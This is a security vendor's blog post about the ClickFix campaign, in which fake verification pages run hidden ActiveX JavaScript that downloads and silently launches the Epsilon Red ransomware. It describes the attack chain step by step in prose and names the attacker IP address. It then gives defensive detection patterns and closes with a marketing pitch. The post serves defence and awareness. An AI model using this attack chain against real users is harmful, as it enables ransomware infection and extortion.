Cybercriminals Weaponize HTA Files Through ClickFix Deception to Deploy Epsilon Red Ransomware

A sophisticated new ransomware campaign has emerged that tricks users into executing malicious .HTA files through fake verification pages. The Epsilon Red ransomware operation, active since July 2025, uses a social engineering technique called “ClickFix” to bypass traditional security measures and infect systems worldwide.

 What is the ClickFix HTA Attack?

ClickFix represents a dangerous evolution in social engineering tactics that exploits users’ trust in familiar online verification processes. Instead of the typical approach where malicious commands are copied to a victim’s clipboard, this new variant directs users to a secondary webpage where hidden JavaScript code automatically executes through legacy ActiveX controls.

The attack begins when users visit what appears to be a legitimate verification page, often mimicking popular services like Discord, Twitch, or streaming platforms. These fake pages present familiar “I’m not a robot” verification prompts that users encounter regularly across the internet. However, clicking these verification buttons triggers a sophisticated attack chain that ultimately downloads and executes Epsilon Red ransomware.

 Severity of the Threat

This attack represents a HIGH severity threat to organizations and individuals worldwide. The campaign poses significant risks because it:

• Bypasses traditional download protections and security warnings
• Exploits legacy Windows technologies that remain enabled on many systems
• Uses trusted verification interfaces that users interact with daily
• Delivers ransomware that encrypts files and demands payment for recovery
• Spreads globally across multiple industries and platforms

The attack’s effectiveness lies in its abuse of legitimate Windows components, making detection challenging for standard security tools.

 How the Attack Works

The Epsilon Red ClickFix campaign follows a carefully orchestrated attack sequence:

Initial Lure: Attackers create fake verification pages that impersonate popular platforms and services. These pages are distributed through compromised websites, phishing emails, malvertising, and SEO poisoning techniques.

Social Engineering: Users encounter what appears to be a standard verification screen with prompts like “Verify you are human by completing the action below” along with familiar verification buttons.

Malicious Redirection: Instead of copying commands to the clipboard like traditional ClickFix attacks, this variant redirects users to a secondary page on the same malicious domain.

ActiveX Exploitation: The secondary page contains embedded JavaScript that creates an ActiveXObject(“WScript.Shell”) to execute shell commands directly through the browser without user awareness.

Silent Payload Delivery: The malicious script runs commands that navigate to the user’s profile directory, download the ransomware executable using curl, and execute it silently in the background.

The specific command sequence involves:

• Changing to the user’s home directory
• Downloading a file named “a.exe” from attacker-controlled infrastructure (155.94.155.227:2269)
• Executing the ransomware payload without displaying any visible windows
• Displaying a fake verification message to maintain the deceptio

(Extra Verification – Source: CloudSEK)

 Who is Behind This Campaign?

The Epsilon Red ransomware campaign appears to be operated by cybercriminals who have developed sophisticated infrastructure for long-term operations. Researchers have identified several characteristics of the threat actors:

Operational Infrastructure: The attackers maintain persistent infrastructure that includes multiple themed delivery pages, romance-based lures, and impersonation of popular services, indicating well-planned and resourced operations.

Target Expansion: The campaign targets users globally across various platforms and services, suggesting the attackers are focused on maximizing infection rates rather than targeting specific organizations.

Technical Sophistication: The attackers demonstrate advanced understanding of both social engineering and technical exploitation techniques, combining familiar user interfaces with complex browser-based attack vectors.

Epsilon Red ransomware was first identified in 2021 and shares some stylistic similarities with REvil ransomware in its ransom notes, though it appears to be a distinct operation with unique tactics and infrastructure.

(Extra Steps – Source: CloudSEK)

 Who is at Risk?

This attack poses threats to a broad range of potential victims:

Individual Users: Anyone who frequents popular online platforms like Discord, Twitch, streaming services, or dating sites may encounter these fake verification pages.

Small and Medium Businesses: Organizations without robust endpoint protection and user security training face significant risks, especially those that allow personal browsing or have legacy systems with ActiveX enabled.

Healthcare Organizations: The healthcare sector has been specifically targeted by ClickFix attacks, with cybercriminals injecting malicious code into medical websites and services.

Automotive Industry: Over 100 automotive industry websites have been compromised through third-party service providers to distribute ClickFix attacks.

Any Organization Using Legacy Systems: Companies that maintain older Windows systems with ActiveX and Windows Script Host enabled are particularly vulnerable to these attacks.

The attack is especially dangerous because it targets human behavior rather than technical vulnerabilities, making it effective against users regardless of their technical expertise.

(Verification Code – Source: CloudSEK)

 Remediation and Protection Strategies

Organizations can implement multiple layers of defense against ClickFix HTA attacks:

Disable Legacy Technologies: Immediately disable ActiveX controls and Windows Script Host (WSH) through Group Policy across all systems. These legacy technologies provide attack vectors that modern organizations rarely need.

Browser Security Hardening: Implement modern browser security policies that block execution of legacy scripting interfaces and enforce strict content security policies.

Network-Level Blocking: Deploy threat intelligence feeds to automatically block known attacker IP addresses and domains associated with ClickFix campaigns. Specifically block access to 155.94.155.227 and related infrastructure.

Endpoint Detection and Response: Configure EDR solutions to monitor for:

• MSHTA.exe execution from browser processes
• Hidden command executions using shell.Run with parameter “0”
• Silent downloads via curl or other download utilities
• Suspicious child process creation from web browsers

User Security Training: Conduct regular phishing simulations that specifically include ClickFix-style attacks. Train users to recognize fake verification pages and understand that legitimate verification never requires running commands or downloading files.

Email Security Controls: Implement advanced email filtering to block phishing messages that direct users to ClickFix pages, including anti-phishing filters and domain verification technologies like DMARC, DKIM, and SPF.

 How CinchOps Can Help Secure Your Business

CinchOps provides comprehensive cybersecurity solutions designed to protect your business from sophisticated threats like the ClickFix HTA ransomware campaign. Our experienced team understands the evolving threat environment and can implement multiple layers of defense to keep your organization secure.

Our managed IT support services include:

• Advanced Endpoint Protection: Deploy and manage next-generation antivirus and EDR solutions that detect browser-based attacks and suspicious script execution
• Network Security Monitoring: Continuous monitoring of network traffic to identify and block malicious communications and payload downloads
• Security Policy Implementation: Configure Group Policies and browser security settings to disable dangerous legacy technologies like ActiveX and WSH
• User Security Training: Regular cybersecurity awareness training that includes current attack techniques like ClickFix and social engineering tactics
• Incident Response Planning: Develop and test incident response procedures specifically for ransomware attacks, including backup verification and recovery processes
• Vulnerability Management: Regular security assessments to identify and remediate potential attack vectors before cybercriminals can exploit them
• Threat Intelligence Integration: Real-time threat feeds and security updates to protect against the latest attack campaigns and malicious infrastructure

CinchOps combines decades of IT security experience with cutting-edge technology to provide the comprehensive protection your business needs against modern cyber threats.

 Discover More 

Discover more about our enterprise-grade and business protecting cybersecurity services: CinchOps Cybersecurity
Discover related topics:ClickFix: The Deceptive Social Engineering Technique Threatening Houston Businesses
For Additional Information on this topic: Ransomware spread using HTA files in new ClickFix campaign

FREE CYBERSECURITY ASSESSMENT